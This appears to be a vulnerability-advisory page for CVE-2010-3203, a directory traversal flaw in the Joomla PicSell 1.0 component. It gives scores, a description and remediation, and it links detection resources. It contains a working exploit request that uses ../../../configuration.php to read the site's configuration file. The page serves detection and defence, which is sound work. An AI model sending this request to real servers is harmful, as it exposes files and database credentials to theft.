🔙 목록으로 돌아가기

CVE-2010-3203: Joomla! Component PicSell 1.0 - Arbitrary File Retrieval

TitleJoomla! Component PicSell 1.0 - Arbitrary File Retrieval
Authordaffainfo
SeverityMedium
ImpactSuccessful exploitation of this vulnerability could allow an attacker to retrieve arbitrary files from the server.
RemediationUpgrade to the latest version to mitigate this vulnerability.
CVSS Score5
EPSS Score0.01836
CVE IDCVE-2010-3203
CWE IDCWE-22
Tags cve cve2010 edb joomla lfi xmlswf vuln

🔍 Vulnerability Description

A directory traversal vulnerability in the PicSell (com_picsell) component 1.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dflink parameter in a prevsell dwnfree action to index.php.

🌐 HTTP Request

GET /index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:1.9.6.20) Gecko/ Firefox/3.6.19
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2010/CVE-2010-3203.yaml

🦈 Packet Capture: ⬇️ Download cve-2010-3203.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A